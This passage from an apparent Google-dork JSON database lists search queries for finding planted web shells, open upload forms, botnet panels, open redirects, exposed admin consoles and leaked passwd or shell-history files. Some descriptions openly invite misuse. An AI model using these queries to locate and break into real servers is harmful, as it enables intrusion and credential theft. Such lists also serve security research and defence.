1.0\"", "description": "# Google Dork: \"PHP Projectworlds 1.0\"\r\n# Advisories and Vulnerabilities\r\n# Date: 18/08/2021 \r\n# Exploit Author: Tanmay Bhattacharjee"}, {"dork": "inurl:\"index.php?page=news.php\"", "description": "# Google Dork: inurl:\"index.php?page=news.php\"\r\n# Advisories and Vulnerabilities\r\n# Date: 18/08/2022\r\n# Author: Omar Shash"}, {"dork": "# Google Dork: intext:\"Powered by Virtual Airlines Manager [v2.6.2]\"", "description": "# Google Dork: intext:\"Powered by Virtual Airlines Manager [v2.6.2]\"\r\n# Advisories and Vulnerabilities\r\n# Date:21/02/2023\r\n# Exploit Author: Milad karimi"}]} \ No newline at end of file +{"Footholds": [{"dork": "intitle:\"ERROR: The requested URL could not be retrieved\" \"While trying to retrieve the URL\" \"The following error was encountered:\"", "description": "squid error messages, most likely from reverse proxy servers."}, {"dork": "intitle:MyShell 1.1.0 build 20010923", "description": "Basicly MyShell is a php program that allows you to execute commands remotely on whichever server it's hosted on."}, {"dork": "inurl:polly/CP", "description": "You can get into admin panel without logging."}, {"dork": "\"Please re-enter your password It must match exactly\"", "description": "Invision Powerboard registration pages. Plain and simple."}, {"dork": "\"index of /\" ( upload.cfm | upload.asp | upload.php | upload.cgi | upload.jsp | upload.pl )", "description": "searches for scripts that let you upload files which you can then execute on the server."}, {"dork": "(intitle:\"WordPress \u00c3\u0192\u00c2\u00a2\u00c3\u00a2\u00e2\u20ac\u0161\u00c2\u00ac\u00c3\u201a\u00c2\u00ba Setup Configuration File\")|(inurl:\"setup-config.php?step=\")", "description": "Alter setup configuration files.add ?step=1"}, {"dork": "inurl:\"amfphp/browser/servicebrowser.swf\"", "description": "AMFPHP service browser, debug interface. Author: syddd"}, {"dork": "intitle:\"uploader by ghost-dz\" ext:php", "description": "intitle:\"uploader by ghost-dz\" ext:php"}, {"dork": "intitle:\"WSO 2.4\" [ Sec. Info ], [ Files ], [ Console ], [ Sql ], [ Php ], [ Safe mode ], [ String tools ], [ Bruteforce ], [ Network ], [ Self remove ]", "description": "dork to find uploaded WSO 2.4 shell by hackers.\nfound by Anon?M ID"}, {"dork": "ext:asp intext:Smart.Shell 1.0 BY P0Uy@_$3r\\/3R -", "description": "A new WebShell interesting. Have Fun.\nBy Rootkit."}, {"dork": "intitle:SN0X SHELL: WEEEEEEEEEEEEEEEEED", "description": "Google Dork that brings up ddos shell"}, {"dork": "intext:\"Thehacker - Agd_Scorp - BLaSTER - Cr@zy_King - KinSize - JeXToXiC - s3f4 - rx5\"", "description": "BLaSTER Webshell Footholds.\nDecoy"}, {"dork": "intext:\"Please select file to upload:\" ext:php", "description": "Various file upload forms - potential footholds?\nDecoy"}, {"dork": "crime24 stealer ext:txt", "description": "crime24 stealer ext:txt\natawho-sonadam-hackunity"}, {"dork": "intitle:\"WSO \" ext:php intext:\"server ip\" 2015 intext:\" [ home ]\"", "description": "intitle:\"WSO \" ext:php intext:\"server ip\" 2015 intext:\" [ home ]\"\natawho-sonadam-hackunity"}, {"dork": "(intitle:\"phpshell\" OR intitle:\"c99shell\" OR intitle:\"r57shell\" OR intitle:\"PHP Shell \" OR intitle:\"phpRemoteView\") `rwx` \"uname\"", "description": "(intitle:\"phpshell\" OR intitle:\"c99shell\" OR intitle:\"r57shell\" OR intitle:\"PHP Shell \" OR intitle:\"phpRemoteView\") `rwx` \"uname\""}, {"dork": "intitle: \"phpshell\" \"Php Safe-Mode Bypass\"", "description": "intitle: \"phpshell\" \"Php Safe-Mode Bypass\""}, {"dork": "intitle:\"nstview v2.1:: nst.void.ru\" | intext:\"nsTView v2.1 :: nst.void.ru. Password: Host:\"", "description": "Anothe webshell \"nstview v2.1.php\"\n-Xploit"}, {"dork": "( ext:php ) ( inurl:/wp-content/uploads/AAPL/loaders/ )", "description": "Finds a few handy little web shells ;)\nDxtroyer"}, {"dork": "intitle:\"Priv8 Mailer Inbox 2015\" ext:php", "description": "Just another mailer :P\nPlease DO NOT use for spam!\nDxtroyer"}, {"dork": "\"El Moujahidin Bypass Shell\" ext:php", "description": "Simple upload/dir shell\n- Dxtroyer"}, {"dork": "\"WHMCS Auto Xploiter\"", "description": "Finds WHMCS exploit shellz in sites\nDxtroyer"}, {"dork": "intitle:\"Authorization\" \"TF\" inurl:\"admin.php\"", "description": "Finds a bunch of unprotected botnet control panels\nDxtroyer"}, {"dork": "\"Sorting Logs:\" \"Please enter your password\" \"Powered By\" -urlscan -alamy", "description": "Finds stealer botnet control panels (If you can guess the login, you'll\nhave access to the WHOLE botnet!)\nDxtroyer"}, {"dork": "intitle:admin intitle:login", "description": "Admin Login pages. Now, the existance of this page does not necessarily mean a server is vulnerable, but it sure is handy to let Google do the discovering for you, no? Let's face it, if you're trying to hack into a web server, this is one of the more obvious places to poke."}, {"dork": "+htpasswd +WS_FTP.LOG filetype:log", "description": "WS_FTP.LOG can be used in many ways to find more information about a server. This query is very flexible, just substitute \"+htpasswd\" for \"+FILENAME\" and you may get several hits that you hadn't seen with the 'normal' search. Filenames suggested by the forum to explore are: phpinfo, admin, MySQL, password, htdocs, root, Cisco, Oracle, IIS, resume, inc, sql, users, mdb, frontpage, CMS, backend, https, editor, intranet . The list goes on and on..A different approach might be \"allinurl: \"some.host.com\" WS_FTP.LOG filetype:log\" which tells you more about who's uploading files to a specific site."}, {"dork": "\"Powered by PHPFM\" filetype:php -username", "description": "PHPFM is an open source file manager written in PHP. It is easy to set up for a beginner, but still easy to customize for the more experienced user. The built-in login system makes sure that only people with the right username and password gains access to PHPFM, however, you can also choose to disable the login system and use PHPFM for public access. It can currently: create, rename and delete folders; create, upload, rename, download and delete files; edit text files; view image files; sort files by name, size, permissions and last modification date both ascending and descending; communicate in more languages. This search finds those \"public\" versions of PHPFM. An attacker can use them to manage his own files (phpshell anyone ?).PS: thanks to j0hnny for the public access angle :)"}, {"dork": "intitle:\"PHP Shell *\" \"Enable stderr\" filetype:php", "description": "PHP Shell is a shell wrapped in a PHP script. It's a tool you can use to execute arbiritary shell-commands or browse the filesystem on your remote Web server. This replaces, to a degree, a normal telnet-connection. You can use it for administration and maintenance of your Web site using commands like ps, free, du, df, and more.If these shells aren't protected by some form of authentication, an attacker will basicly *own* the server. This search finds such unprotected phpshells by looking for the keyword \"enable stderr\"."}, {"dork": "\"adding new user\" inurl:addnewuser -\"there are no domains\"", "description": "Allows an attacker to create an account on a server running Argosoft mail server pro for windows with unlimited disk quota (but a 5mb per message limit should you use your account to send mail)."}, {"dork": "intitle:\"Web Data Administrator - Login\"", "description": "The Web Data Administrator is a utility program implemented in ASP.NET that enables you to easily manage your SQL Server data wherever you are. Using its built-in features, you can do the following from Internet Explorer or your favorite Web browser. Create and edit databases in Microsoft SQL Server 2000 or Microsoft SQL Server 2000 Desktop Engine (MSDE) Perform ad-hoc queries against databases and save them to your file system Export and import database schema and data."}, {"dork": "(inurl:81/cgi-bin/.cobalt/) | (intext:\"Welcome to the Cobalt RaQ\")", "description": "The famous Sun linux appliance. The default page displays this text:\"Congratulations on Choosing a Cobalt RaQ - the premier server appliance platform for web hosting. This page can easily be replaced with your own page. To replace this page, transfer your new content to the directory /home/sites/home/web\"."}, {"dork": "inurl:ConnectComputer/precheck.htm | inurl:Remote/logon.aspx", "description": "Windows Small Business Server 2003: The network configuration page is called \"ConnectComputer/precheck.htm \" and the Remote Web login page is called \"remote/logon.aspx\"."}, {"dork": "filetype:php HAXPLORER \"Server Files Browser\"", "description": "Haxplorer is a webbased filemanager which enables the user to browse files on the webserver. You can rename, delete, copy, download and upload files. As the script's name says it is mostly installed by hackers"}, {"dork": "PHPKonsole PHPShell filetype:php -echo", "description": "PHPKonsole is just a little telnet like shell wich allows you to run commands on the webserver. When you run commands they will run as the webservers UserID. This should work perfectly for managing files, like moving, copying etc. If you're using a linux server, system commands such as ls, mv and cp will be available for you..."}, {"dork": "inurl:\"phpOracleAdmin/php\" -download -cvs", "description": "phpOracleAdmin is intended to be a webbased Oracle Object Manager.In many points alike phpMyAdmin, it should offer more comfort and possibilities. Interestingly these managers are not password protected."}, {"dork": "intitle:\"YALA: Yet Another LDAP Administrator\"", "description": "YALA is a web-based LDAP administration GUI. The idea is to simplify the directory administration with a graphical interface and neat features, though to stay a general-purpose programThe goal is to simplify the administration but not to make the YALA user stupid: to achieve this, we try to show the user what YALA does behind the scenes, what it sends to the server"}, {"dork": "intitle:\"net2ftp\" \"powered by net2ftp\" inurl:ftp OR intext:login OR inurl:login", "description": "net2ftp is a web-based FTP client written in PHP. Lets explain this in detail. Web-based means that net2ftp runs on a web server, and that you use a browser (for example Internet Explorer or Mozilla)"}, {"dork": "inurl:\"tmtrack.dll?\"", "description": "This query shows installations of Serena Teamtrack. (www.serena.com).You may be able to adjust the application entry point, by providing a command after the \"tmtrack.dll?\" like thistmtrack.dll?LoginPagetmtrack.dll?View&Template=viewand more."}, {"dork": "(intitle:\"SHOUTcast Administrator\")|(intext:\"U SHOUTcast D.N.A.S. Status\")", "description": "sHOUTcast is a free-of-charge audio homesteading solution. It permits anyone on the internet to broadcast audio from their PC to listeners across the Internet or any other IP-based network (Office LANs, college campuses, etc.).SHOUTcast's underlying technology for audio delivery is MPEG Layer 3, also known as MP3 technology. The SHOUTcast system can deliver audio in a live situation, or can deliver audio on-demand for archived broadcasts."}, {"dork": "allintext:\"fs-admin.php\"", "description": "A foothold using allintext:\"fs-admin.php\" shows the world readable \ndirectories of a plug-in that enables Wordpress to be used as a forum. Many \nof the results of the search also show error logs which give an attacker the \nserver side paths including the home directory name. This name is often also \nused for the login to ftp and shell access, which exposes the system to \nattack. There is also an undisclosed flaw in version 1.3 of the software, as \nthe author has mentioned in version 1.4 as a security fix, but does not tell \nus what it is that was patched.\n \nAuthor: DigiP"}, {"dork": "Re: intitle:Priv8 SCR", "description": "I am Un0wn_X\nSymlink User configs\nintitle:Priv8 SCR"}, {"dork": "intitle:C0ded By web.sniper", "description": "User & Domain || Symlink\nUsing this dork you can find the User and the Domains of the Server...\nintitle:C0ded By web.sniper\nAuthor: Un0wn_X"}, {"dork": "Re: inurl:\"r00t.php\"", "description": "This dork finds websites that were hacked, backdoored and contains their \nsystem information e.g: Linux web.air51.ru 2.6.32-41-server #89-Ubuntu\nSMP Fri Apr 27 22:33:31 UTC 2012 x86_64.\nJay Turla a.k.a shipcode"}, {"dork": "inurl:1337w0rm.php intitle:1337w0rm", "description": "Finds websites that have 1337w0rm's CPanel cracker uploaded.\nSince the Cracker is relatively new, some sites might not use it. \n-TehMysticaL"}, {"dork": "filetype:php intext:\"!C99Shell v. 1.0 beta\"", "description": "php backdoor: c99 shell\n-- \n-[Voluntas Vincit Omnia]-\nwebsite http://www.erisresearch.org/\nGoogle+ https://plus.google.com/u/0/114827336297709201563"}, {"dork": "intitle:\"=[ 1n73ct10n privat shell ]=\"", "description": "the dork is used to find uploaded 1n73ct10n Shell on website.\nfound by Anon?M ID"}, {"dork": "inurl:sh3llZ/c99/", "description": "Through this shell you can find c99 shells uploaded on websites. inurl:sh3llZ/c99/"}, {"dork": "ext:php intitle:\"b374k\"", "description": "ext:php intitle:\"b374k\"\ndetails; http://atawho.blogspot.com.tr/2015/12/b374k-shell-tespiti.html\natawho-sonadam-hackunity"}, {"dork": "ext:aspx intitle:aspxspy", "description": "Asp shells\next:aspx intitle:aspxspy\ndetails:\nhttp://atawho.blogspot.com.tr/2015/11/aspx-shell-dorku-ghbd.html\nsonadam-atawho-hackunity"}, {"dork": "intext:\"Sw Bilgi\" ext:php", "description": "Upload Shell Dork\nintext:\"Sw Bilgi\" ext:php\n details:\nhttp://atawho.blogspot.com.tr/2015/11/shell-dork-031115.html\natawho-sonadam-hackunity"}, {"dork": "intext:Developed By Black.Hack3r ext:php", "description": "Upload Shell Dorks\nintext:Developed By Black.Hack3r ext:php\nintitle:.:: Private Uploder By Black.Hack3r ::. ext:php\ndetail:"}, {"dork": "intitle:\"Shell I\" inurl:revslider inurl:error.php inurl:cmd", "description": "Find shells inserted using the revslider vulnerability.\n--\nStephen Haywood\nOwner: ASG Consulting\naveragesecurityguy.info"}, {"dork": "inurl:revslider inurl:temp inurl:update_extract inurl:sym1", "description": "Symlinks to files using the revslider vulnerability.\n--\nStephen Haywood\nOwner: ASG Consulting\naveragesecurityguy.info"}, {"dork": "intitle:Automatic cPanel Finder/Cracker | 3xp1r3 Cyber Army", "description": "Google dork Description : intitle:\"Automatic cPanel Finder/Cracker | 3xp1r3 Cyber Army\"\nAuthor: youssef hesham\nan exploit to find uploaded cPanel Finder/Cracker script and find cracked cpanle on it"}, {"dork": "\"Fenix Final Version v2.0\" filetype:php", "description": "Web-Shell new, very interesting.\nHave Fun.\nRegards.\nRootkit Pentester."}, {"dork": "intitle:\"Hamdida X_Shell Backd00r\"", "description": "Interesting little backdoor.\nintitle:\"Hamdida X_Shell Backd00r\"\nDecoy"}, {"dork": "filetype:php intext:Your Email: intext:Your Name: intext:Reply-To: intext:mailer", "description": "This dork results in PHP mailers already uploaded and ready for use ! ;)\nGoogle Dork :\nfiletype:php intext:\"Your Email:\" intext:\"Your Name:\" intext:\"Reply-To:\" intext:mailer\n \nBest Regards.\nXSLASH"}, {"dork": "\"You have selected the following files for upload (0 Files).\"", "description": "Find file upload pages. \nThe dork is: \"You have selected the following files for upload (0 Files).\"\nGabe Mills\nHacker"}, {"dork": "inurl:\"html/js/editor/ckeditor/\"", "description": "name =find liferay upload file\nGoogle dork Description: inurl:\"html/js/editor/ckeditor/\"\nGoogle search: inurl:\"html/js/editor/ckeditor/\"\nDate: 2016-09-30\nAuthor: sultan albalawi\nFind file upload pages.\nSummary: liferay upload file."}, {"dork": "\"File Manager Version 1.0\" \"Coded By\"", "description": "File Managers webshells. Enjoy with healthy.\nDork by Rootkit Pentester."}, {"dork": "\"PHP eMailer is created by\" ext:php", "description": "Dork: \"PHP eMailer is created by\" ext:php\nPHP SMTP MAILER\nNo comment, don't waste your time for negative thinking. \nNO SPAM PLEASE ..\nDork by INILERM"}, {"dork": "\"PHP Mailer\" \"priv8 Mailer\" ext:php", "description": "Dork: \"PHP Mailer\" \"priv8 Mailer\" ext:php\nPHP (SMTP) MAILER\nNo comment, don't waste your time for negative thinking. \nNO SPAM PLEASE ..\nDork by INILERM"}, {"dork": "Meg4-Mail ext:php", "description": "Google Dork: Meg4-Mail ext:php\nPHP MAILER\nNO SPAM PLEASE ..\nGoolge Dork by INILERM"}, {"dork": "inurl:/\\\\filesrc=**** ~\"Current\" ~\":/\" ~\"upload\"", "description": "Extensive list of shell backdoors implimented on websites.\ninurl:/\\\\filesrc=**** ~\"Current\" ~\":/\" ~\"upload\" -codex -smashingmagazine\n-'pub' -'public' -'mp3' -fossies -websvn -svn -git -login -.de -.fl -.ru\n-.jp -.kr -.ch -.dk -dorks -google -Google -.gov -prevent -help -how -reset\n-your -developer -reference -support -github\nAnything with \"-\" in the beginning is used to help combat the fact that\ngoogle does not really want us to see all of the results. If we do not\nfilter through, google will mark us as a bot user and block our ip address.\nThe \"do not search\" expression is as important as the term or phrase we\nwish to search and match for.\nThanks,\nMrM"}, {"dork": "inurl:?filesrc=**** ~\"Current\" ~\"asp\"", "description": "Also here are more different uploaded shell names.\ninurl:\"?filesrc=//\" \"Upload\" ~admin\n \n-Xploit"}, {"dork": "inurl:\"go.cgi?url=\"", "description": "Finds pages which can be exploited to redirect to any site (You could use\nthis for phishing, etc.)\nDxtroyer"}, {"dork": "intitle:index of intext:wncry", "description": "Dork to find servers affected by Wannacry Ransomware.\nAuthor https://twitter.com/SadFud75"}, {"dork": "intitle:index of intext:@WanaDecryptor@.exe", "description": "More of the Wannacry Ransonware infected Servers.\nintitle:index of intext:@Please_Read_Me@.txt\n-Xploit"}, {"dork": "ext:php intext:\"-rwxr-xr-x\" site:.in", "description": "You can find the software affected at:\n ext:php intext:\"-rwxr-xr-x\" site:.in\nArmhacker666"}, {"dork": "ext:jsp intext:\"jspspy\" intitle:\"Jspspy web~shell V1.0\"", "description": "Find login portals of jspspy webshell.\r\nHuijun Chen"}, {"dork": "intitle:\"Solr Admin\" \"Solr Query Syntax\"", "description": "Finds Apache Solr admin panels\r\n\r\nDxtroyer"}, {"dork": "inurl:/install/stringnames.txt", "description": "inurl:/install/stringnames.txt\r\n\r\n this DORK is useful to search moodle cms with install folder left on the hosted server"}, {"dork": "intitle:\"Installing TYPO3 CMS\"", "description": "This will find the First Install Wizard of the TYPO3 CMS.\r\n\r\nThis is NOT the same as this dork: https://www.exploit-db.com/ghdb/3942/\r\nwhich lets you find the Install tool, which is available after the\r\nInstallation itself.\r\n\r\nMy dork will rather find the First Install wizard, which opposed to the\r\nInstall tool does not have a password protection.\r\n\r\nSome Installations should be able to be hijacked this way.\r\n\r\nUse ethically and responsibly.\r\nDork by _palonE"}, {"dork": "intitle:Upload inurl:/cgi-bin/filechucker.cgi", "description": "AJAX-based web application / file manager - \u201cfilechucker\u201d that lets you upload arbitary files on a website.\r\n\r\n\r\nAuthor: Parth S. Patel\r\nhttps://ca.linkedin.com/in/parthpateloscp"}, {"dork": "inurl:\"/tiny_mce/plugins/ajaxfilemanager/inc/data.php\" | inurl:\"/tiny_mce/plugins/ajaxfilemanager/ajax_create_folder.php\" -github", "description": "finds tiny_mce vulnerable targets\r\n\r\n\r\n-- \r\n*Regards*\r\n*Ebaduddin Ahmad*"}, {"dork": "inurl: \"Mister Spy\" | intext:\"Mister Spy & Souheyl Bypass Shell\"", "description": "inurl: \"Mister Spy\" | intext:\"Mister Spy & Souheyl Bypass Shell\"\r\n\r\nThis Google Dork discovers servers infected with the \"Mister Spy\" web \r\nshell.\r\n\r\n\r\n- Gionathan \"John\" Reale (https://www.exploit-db.com/author/?a=9609)"}, {"dork": "\"File Manager - Current disk free\"", "description": "# Google Dork: \"File Manager - Current disk free\"\r\n# Date: 18/8/2018\r\n# Exploit Author: srikwit\r\n\r\nGoogle Dork to locate PhpSpy web shells"}, {"dork": "\"index of\" /wp-content/uploads/shell.php", "description": "\"index of\" /wp-content/uploads/shell.php\r\n\r\nThis Google Dork discovers servers running Wordpress that are infected \r\nwith web shells.\r\n\r\n\r\n- Gionathan \"John\" Reale (https://www.exploit-db.com/author/?a=9609)"}, {"dork": "intext:\"M3R1C4 SHELL BACKDOOR\"", "description": "intext:\"M3R1C4 SHELL BACKDOOR\"\r\n\r\nfoothold web shell\r\n\r\nManhNho"}, {"dork": "intitle:\"FCKeditor - Uploaders Tests\"", "description": "Dork: intitle:\"FCKeditor - Uploaders Tests\"\r\n\r\n\r\nUnauthenticated file upload\r\n\r\n\r\n\r\nBurov Konstantin"}, {"dork": "intitle:\"FCKeditor - Connectors Tests\"", "description": "Dork: intitle:\"FCKeditor - Connectors Tests\"\r\n\r\n\r\nUnauthenticated file upload and directory list\r\n\r\n\r\nBurov Konstantin"}, {"dork": "intitle:\"InfluxDB - Admin Interface\" -github", "description": "Dork about InfluxDB without password\r\nInfluxDB - Open Source Time Series DB Platform for Metrics & Events (Time Series Data)\r\n\r\n\r\nintitle:\"InfluxDB - Admin Interface\" -github\r\n\r\n\r\nAuthor : *.doc-TOR aka Brain Reflow https://twitter.com/The_d0c_T0R"}, {"dork": "inurl:\"/sidekiq/busy\"", "description": "*Google dork description: Get the sidekiq dashboard that is used to run\r\nRuby systems. You have the access to view, start, stop processes*\r\n\r\n*Google Search:* inurl:\"/sidekiq/busy\"\r\n\r\n*Submitted by:* Alfie\r\n\r\nWebsite: (https://the-infosec.com)"}, {"dork": "inurl:/phpMyAdmin/setup/index.php?phpMyAdmin=", "description": "Exploit : Access the Sensitive page of phpmyadmin\r\n\r\nGoogle Dork : inurl:/phpMyAdmin/setup/index.php?phpMyAdmin=\r\n\r\nExploit Author:- Ehsan Nikavar"}, {"dork": "inurl:wp-login.php?action=register", "description": "Wordpress sites with registration enabled."}, {"dork": "inurl:\"urlstatusgo.html?url=\" -intext:\"Disallowed by URL filter\"", "description": "Open Redirects.\r\n\r\nD"}, {"dork": "inurl:\"cs.html?url=\"", "description": "Open Redirects.\r\n\r\nD"}, {"dork": "inurl:/phpmyadmin/index.php?db=", "description": "inurl:/phpmyadmin/index.php?db=\r\n\r\nphpmyadmin authenticated panel\r\n\r\nManhNho"}, {"dork": "intitle:Administration - Installation - MantisBT", "description": "Dorks for mantisBT CMS installation\r\n\r\nMr.XSecr3t"}, {"dork": "inurl:\"index.php?db=\"", "description": "Google Dork: \"index.php?db=\"\r\nDate: 09/14/2019\r\nExploit Author: th3d3xt3r\r\nCategory: Footholds"}, {"dork": "site:*/wp-admin/install.php intitle:WordPress Installation", "description": "Files Containing Juicy Info:\r\n\r\nsite:*/wp-admin/install.php intitle:WordPress Installation\r\n\r\nReza Abasi(Turku)"}, {"dork": "intitle:\"freedom is real - 1945\"", "description": "Dork:\r\nintitle:\"freedom is real - 1945\"\r\nCategory: Vulnerable servers\r\nAuthor: Jakob Denlinger\r\n\r\nInfo:\r\nCommon webshell that sets the HTML title tag to '.[ freedom is real - 1945\r\n].'"}, {"dork": "inurl:\"index of\" wso", "description": "Dork:inurl:\"index of\" wso\r\nAuthor:Santhosh Kumar Kuppan\r\nInformation: Access to WSO shell infected domains."}, {"dork": "site:bamboo.*.* ext:action build", "description": "find misconfigured and open bamboo instances\r\n\r\nex16x41"}, {"dork": "intitle:\"(SSI Web Shell)\" AND intext:\"(ls -al)\"", "description": "# Dork #\r\n\r\nintitle:\"(SSI Web Shell)\" AND intext:\"(ls -al)\"\r\n\r\nFootholds for SSI Web Shell."}, {"dork": "intitle:(\"Mini Shell\") AND intext:(\"Upload File\")", "description": "# Dork #\r\n\r\nintitle:(\"Mini Shell\") AND intext:(\"Upload File\")\r\n\r\n\r\nFootholds for Mini Web Shell."}, {"dork": "intitle:(\"Index of\") AND intext:(\"c99.txt\" OR \"c100.txt\")", "description": "# Dork #\r\n\r\nintitle:(\"Index of\") AND intext:(\"c99.txt\" OR \"c100.txt\")\r\n\r\nFootholds for possible infected domain with web shell contents."}, {"dork": "site:linkedin.com employees target.com", "description": "*Dork: *site:linkedin.com employees target.com\r\n\r\n*Description:* This google dork will list all the employees of a particular\r\norganisation who are there on linkedin.\r\n\r\n*Author:* Shamika Shewale"}, {"dork": "inurl:\"customer.aspx\"", "description": "# Google Dork: inurl:\"customer.aspx\"\r\n# Title: Containing feedback Portal\r\n# Date: 2020-06-07\r\n# Author: Mahesh Rai\r\n#LinkedIn: https://www.linkedin.com/in/mahesh-rai\r\n#Bugcrowd: https://bugcrowd.com/Mahesh_Rai"}, {"dork": "inurl:/servicedesk/customer/user/login", "description": "Google Dork: inurl:/servicedesk/customer/user/login\r\n\r\nPages containing Login Portals\r\n\r\nAuthor: Rutwik Shah"}, {"dork": "Find Microsoft Lync Server AutoDiscover", "description": "Dork: allinurl:XFrame.html\r\n\r\nFind Microsoft Lync Server AutoDiscover\r\n\r\nDiscovered By: Kevin Randall"}, {"dork": "inurl:/download_file/ intext:\"index of /\"", "description": "inurl:/download_file/ intext:\"index of /\"\r\n\r\n----\r\nRegards,\r\nRishabh Chaplot"}, {"dork": "intitle:\"index of\" \"admin/xml\"", "description": "Google Dork: intitle:\"index of\" \"admin/xml\"\r\nExploit Author: Viraj Mota\r\nDescription: This Google dork lists out sensitive XML file stored in the\r\nadmin folder for a website.\r\n\r\nBest regards,\r\nViraj Mota"}, {"dork": "inurl:logon/LogonPoint/index.html", "description": "Dork: inurl:logon/LogonPoint/index.html\r\nDescription: Find Citrix Gateway Portals that might be potentially\r\nvulnerable to CVE-2019-19781.\r\nAuthor - Harsh Bothra\r\nTwitter - https://www.twitter.com/harshbothra_"}, {"dork": "inurl:\"/arcgis/rest/services\"", "description": "# Find Esri ArcGIS servers.\r\n# Author: Tolga Kaya\u015f\r\n# Date: 18/06/2020\r\n# Linkedin: https://www.linkedin.com/in/tolga-k/"}, {"dork": "inurl:\"/jmx-console/HtmlAdaptor?action\"", "description": "Dork: inurl:\"/jmx-console/HtmlAdaptor?action\"\r\nDescription: Sensitive data Exposure\r\n---\r\nAuthor: Krushna Lipane"}, {"dork": "intitle:\"index of\" and intext:\"vendor\" and intext:\"phpunit\"", "description": "# Dork: intitle:\"index of\" and intext:\"vendor\" and intext:\"phpunit\"\r\n# Author: Arpit Kubadia\r\n# This dork searches both for directory listings,\r\n# as well as a well-known PHP file called PHPUnit that is often vulnerable to\r\n# remote code execution.\r\n# Attaching below the same dork in attachment\r\n\r\n# Regards."}, {"dork": "\"radius-server key\" ext:cfg OR ext:log OR ext:txt", "description": "# Google Dork: \"radius-server key\" ext:cfg OR ext:log OR ext:txt\r\n# By using this dork some radius-server keys can be found.\r\n# Date: 1/07/2020\r\n# Author: Alexandros Pappas"}, {"dork": "intitle:\"index of\" \"nginx.log\"", "description": "Description : intitle:\"index of\" \"nginx.log\"\r\n\r\nThis google dork gives us the Nginx logs and sensitive details of\r\nmisconfigured servers.\r\n\r\n\r\n\r\n\r\n\r\n\r\nRegards,\r\nEmmanuel Karunya\r\n+919743055278"}, {"dork": "intitle:\"Index of /\" +.htaccess", "description": "Dork:intitle:\"Index of /\" +.htaccess\r\nDescription: Access to the parent directory and more...\r\nAuthor: Priyanka Prasad"}, {"dork": "intitle:\"index of /\" +.htdocs", "description": "Description: intitle:\"index of /\" +.htdocs\r\nAccess to the parent directory and get lots of information of directory\r\nand contains with sensitive information.This kind of foothold.\r\n\r\nLinkedin : https://www.linkedin.com/in/peaceonmind/\r\n\r\nThanks,\r\nTanmay Bhattacharjee"}, {"dork": "intitle:\"index.of\" +jmx-console", "description": "Description: intitle:\"index.of\" +jmx-console\r\n\r\nThis google dorks give us java management extention.\r\n\r\n\r\nThanks,\r\nTanmay Bhattacharjee"}, {"dork": "inurl:CTCWebService", "description": "# Google Dork: inurl:CTCWebService\r\n# Date: 8/24/2020\r\n# Exploit Author: Javier Bernardo\r\n# Homepage: www.hack.com.ar\r\n\r\nJavier Bernardo\r\n*Information Security Analyst \u2013 Ethical Hacker*\r\nAires - Argentina"}, {"dork": "inurl::/app/kibana \"Kibana\" -discuss -ipaddress -git", "description": "# Google Dork: inurl::/app/kibana \"Kibana\" -discuss -ipaddress -git\r\n# Kibana Visualization Dashboards\r\n# Date: 31/08/2020\r\n# Exploit Author: Adithya Chandra\r\n\r\n\r\nThanks and Best Regards,\r\nAdithya Chandra"}, {"dork": "inurl:/Dashboard.xhtml intitle:\"Dashboard\"", "description": "# Google Dork: inurl:/Dashboard.xhtml intitle:\"Dashboard\"\r\n# Various exposed dashboards.\r\n# Date: 1/09/2020\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "inurl:\"/plugins/servlet/Wallboard/\"", "description": "Google Dork : inurl:\"/plugins/servlet/Wallboard/\"\r\n\r\nThis will give all the Jira dashboard which might be vulnerable to XSS.\r\n(Sensitive Data Exposure)\r\n\r\nAuthor : Pratik Khalane\r\n\r\nDate : 10/09/2020"}, {"dork": "mail/u/0 filetype:pdf", "description": "Google Dork: mail/u/0 filetype:pdf\r\nDescription: Pages Exposing internal Documents\r\nDate: 11/09/2020\r\n\r\nThanks & Regards\r\nAjithKumar K"}, {"dork": "intitle:\"index of\" \"httpd.pid\"", "description": "Dork: intitle:\"index of\" \"httpd.pid\"\r\n\r\n\r\n*Regards,*\r\n*Navaneeth Shyam*\r\n*Security Researcher*"}, {"dork": "inurl:wsnavigator/jsps", "description": "# Google Dork: inurl:wsnavigator/jsps\r\n\r\n# Date: 9/11/2020\r\n# Exploit Author: Javier Bernardo\r\n# Homepage:\r\n[www.hack.com.ar](http://www.hack.com.ar/)\r\n\r\nJavier Bernardo\r\nInformation Security Analyst \u2013 Ethical Hacker\r\nMobile: +54 9 11 6219 0141 |[Email:javierbernardo001@gmail.com](mailto:Email%3Ajavierbernardo001@gmail.com) | Buenos Aires - Argentina\r\n\r\nSent with [ProtonMail](https://protonmail.com) Secure Email."}, {"dork": "inurl:maps.arcgis.com +\"City of\"", "description": "# Google Dork: inurl:maps.arcgis.com +\"City of\"\r\n# Footholds\r\n# Date: 22/09/21\r\n# Exploit Author: Edmond Major"}, {"dork": "inurl:adminpanel site:gov.*", "description": "# Description : inurl:adminpanel site:gov.*\r\n# This google dork indexes pages containing Admin Login Panels of government\r\n# sites where an attacker can login and bypass restrictions if not configured\r\n# properly.\r\n# Author : Asheet Tirkey\r\n# Date : 11th Jan 2022"}], "Files Containing Usernames": [{"dork": "+intext:\"webalizer\" +intext:\"Total Usernames\" +intext:\"Usage Statistics for\"", "description": "The webalizer program displays various information but this query displays usernames that have logged into the site. Attckers can use this information to mount an attack."}, {"dork": "intext:\"SteamUserPassphrase=\" intext:\"SteamAppUser=\" -\"username\" -\"user\"", "description": "This will search for usernames and passwords for steam (www.steampowered.com) taken from the SteamApp.cfg file."}, {"dork": "inurl:\"/root/etc/passwd\" intext:\"home/*:\"", "description": "inurl:\"/root/etc/passwd\" intext:\"home/*:\""}, {"dork": "intext:\"root:x:0:0:root:/root:/bin/bash\" inurl:*=/etc/passwd", "description": "Author: ./tic0 | Izzudin al-Qassam Cyber Fighter"}, {"dork": "inurl:/_layouts/mobile/view.aspx?List=", "description": "I came across on a string \\ dork that does not exist anywhere and it allows\nyou to see the metadata of all the domain's content & index everything.\nhere is the dork 'inurl:/_layouts/mobile/view.aspx?List='\nIt enables you to access MIcrosoft Sharepoint CMS based domains\nIn the following format\nYou're able to view the source user (modified or created by)\n1. Depending on the target it can be used in a brute-force attack for\nconstructing a password list with the internal user information.\n2. It is a serious information disclosure issue (due to the reason that\nsome Government websites also use MIcrosoft Sharepoint) and it discloses\ntheir employees names.\nEva Prokofiev"}, {"dork": "intitle:index.of .sh_history", "description": "Ok, this file contains what a user typed at a shell command prompt. You shouldn't advertise this file. You shouldn't flash it to a web crawler. It contains COMMANDS and 